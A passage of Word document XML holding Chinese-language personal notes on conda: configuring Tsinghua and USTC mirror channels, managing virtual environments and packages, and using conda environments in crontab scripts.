          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都是</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00C76539" w:rsidRPr="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本的，需要使用官方源下载</w:t>
      </w:r>
      <w:r w:rsidR="00C76539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD139E4" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C76539">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda config --remove-key channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6DA09" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3731AD03" w14:textId="1FB470F8" w:rsidR="005A435D" w:rsidRDefault="005A435D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制源灵活还是严格</w:t>
      </w:r>
      <w:r w:rsidR="00344B1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00B13F29" w:rsidRPr="00B13F29">
        <w:t>'strict', 'flexible', and 'disabled'</w:t>
      </w:r>
      <w:r w:rsidR="00344B1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710FF325" w14:textId="7669A843" w:rsidR="005A435D" w:rsidRDefault="005A435D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005A435D">
        <w:t>conda config --set channel_priority flexible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E9A23" w14:textId="7D35E787" w:rsidR="005A435D" w:rsidRDefault="00A20734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A20734">
        <w:t>conda config --set channel_priority strict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B627B" w14:textId="77777777" w:rsidR="00A20734" w:rsidRDefault="00A20734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E9CB08" w14:textId="549E33DC" w:rsidR="00344B1B" w:rsidRDefault="00344B1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00344B1B">
        <w:t>conda config --set channel_priority true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5C030" w14:textId="473A5F8A" w:rsidR="00344B1B" w:rsidRDefault="00344B1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00344B1B">
        <w:t>conda config --set channel_priority false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F60BE" w14:textId="77777777" w:rsidR="00A20734" w:rsidRDefault="00A20734" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22076EED" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123743E8" w14:textId="56500C89" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00534EEA">
        <w:t>conda config</w:t>
      </w:r>
      <w:r w:rsidR="007F00B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F21E2">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00534EEA">
        <w:t>show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C378848" w14:textId="40B2898E" w:rsidR="008F21E2" w:rsidRDefault="008F21E2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F21E2">
        <w:t>conda config --show-sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D34CB88" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D711FB6" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清华源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA53F9" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/msys2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD43C8B" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223661B" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310E9D5" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/pytorch/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE769EC" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD73889" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --set show_channel_urls yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0A347" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A4CDE2" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中科大源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B30F1" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/pkgs/main/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00115F3A" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/pkgs/free/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357EE719" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/cloud/conda-forge/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074784F" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/cloud/msys2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F384816" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/cloud/bioconda/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D326894" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --add channels https://mirrors.ustc.edu.cn/anaconda/cloud/menpo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2E7E1" w14:textId="77777777" w:rsidR="00167C14" w:rsidRDefault="00167C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda config --set show_channel_urls yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12039DCE" w14:textId="77777777" w:rsidR="00041385" w:rsidRPr="00167C14" w:rsidRDefault="00041385" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338E40E9" w14:textId="66E5C4D3" w:rsidR="00EC0061" w:rsidRDefault="00D91C50" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="_Toc159779711"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="536A5445" w14:textId="77777777" w:rsidR="00EC0061" w:rsidRPr="00EC0061" w:rsidRDefault="00EC0061" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE0D0F" w14:textId="7F4BD08A" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B68E4" w14:textId="2AFB89A0" w:rsidR="000E4737" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">conda </w:t>
      </w:r>
      <w:r w:rsidR="000E4737">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDB8EED" w14:textId="47EB8540" w:rsidR="001808BF" w:rsidRDefault="001808BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3163C53D" w14:textId="1E1C562C" w:rsidR="001808BF" w:rsidRDefault="001808BF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在当前用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>bashrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6656D5E7" w14:textId="77EFDC83" w:rsidR="001808BF" w:rsidRDefault="001808BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00543591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00543591">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onda init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B9475" w14:textId="77777777" w:rsidR="001808BF" w:rsidRDefault="001808BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AB53AA" w14:textId="19D8D04C" w:rsidR="001C4ED4" w:rsidRDefault="008B1C22" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
      <w:r w:rsidR="001C4ED4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B566F7" w14:textId="77777777" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda info --envs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BF324" w14:textId="6E259088" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建虚拟环境并指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB64A6" w14:textId="3ECA2C51" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda create -n virtualname python=3.9</w:t>
      </w:r>
      <w:r w:rsidR="00707026">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13811377" w14:textId="3EFF37C9" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D489EE" w14:textId="77777777" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda activate virtualname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC5729" w14:textId="46DBE1FB" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968A8B8" w14:textId="77777777" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda deactivate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D791B" w14:textId="4FF045CF" w:rsidR="001C4ED4" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ACA5EB" w14:textId="48BBC79E" w:rsidR="00EC0061" w:rsidRPr="00EC0061" w:rsidRDefault="001C4ED4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conda remove --name virtualname --all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DCA18" w14:textId="418EB876" w:rsidR="002A2DCD" w:rsidRDefault="002A2DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B47541F" w14:textId="1A72E728" w:rsidR="002A2DCD" w:rsidRDefault="002A2DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3C73C9" w14:textId="77777777" w:rsidR="008720A6" w:rsidRDefault="008720A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C296679" w14:textId="49EDC8FC" w:rsidR="008720A6" w:rsidRDefault="008720A6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装包和卸载包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19351DFA" w14:textId="77777777" w:rsidR="008720A6" w:rsidRDefault="008720A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F00275" w14:textId="45FB299D" w:rsidR="008720A6" w:rsidRDefault="00F814E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42020BC5" w14:textId="4A5AE708" w:rsidR="008720A6" w:rsidRDefault="00117CDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指定源，如下是指定官方源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>anaconda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF9AF5" w14:textId="4A88813B" w:rsidR="008720A6" w:rsidRDefault="00117CDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00117CDC">
        <w:t>conda install -c anaconda pytorch==1.12.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB20A0" w14:textId="77777777" w:rsidR="008720A6" w:rsidRDefault="008720A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25991AE9" w14:textId="5BAD895F" w:rsidR="008720A6" w:rsidRDefault="00E41F0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63E8CE" w14:textId="4D63BC41" w:rsidR="00E41F0F" w:rsidRDefault="004F5365" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5365">
        <w:t>conda remove package_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A9E5B" w14:textId="70A95C5F" w:rsidR="002A2DCD" w:rsidRDefault="00C07FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="252" w:name="_Toc159779712"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务中如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidR="00592CB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境</w:t>
      </w:r>
      <w:r w:rsidR="00005D93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00005D93">
        <w:t>bash_rc</w:t>
      </w:r>
      <w:r w:rsidR="00005D93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中提前写好环境变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w14:paraId="55C8C7BB" w14:textId="75742A03" w:rsidR="00520B60" w:rsidRDefault="00520B60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人总结，需要在程序中专门执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00520B60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="00520B60">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>~/.bash_source</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41F33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才</w:t>
      </w:r>
      <w:r w:rsidR="008F7336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能在这个脚本中使用</w:t>
      </w:r>
      <w:r w:rsidR="008F7336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidR="008F7336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD2B22" w14:textId="77777777" w:rsidR="00520B60" w:rsidRPr="00EE6BAD" w:rsidRDefault="00520B60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2938E12E" w14:textId="112452CF" w:rsidR="008C5E55" w:rsidRDefault="00A80504" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入用户</w:t>
      </w:r>
      <w:r w:rsidR="00F452D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00F452D4">
        <w:t>ashrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的部分复制出来到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>bash_source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA0EA8" w14:textId="7AB77FE1" w:rsidR="00A80504" w:rsidRDefault="00A80504" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="00861D87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建自己的</w:t>
      </w:r>
      <w:r w:rsidR="00861D87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r w:rsidR="00861D87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要启动的</w:t>
      </w:r>
      <w:r w:rsidR="00861D87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00861D87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B923D" w14:textId="77777777" w:rsidR="00861D87" w:rsidRPr="007363D3" w:rsidRDefault="00861D87" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007363D3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
